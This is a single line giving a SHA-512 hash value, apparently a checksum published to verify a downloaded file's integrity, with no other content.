SHA512e9faf8313a8a9ffe5f784acb229166c4279a560c4e31afca7ae00da1c110db49bd732dfe20e88e4c6ddf63234cdc2a0b94a7aba2c1b3ad6e1b168ec3437895db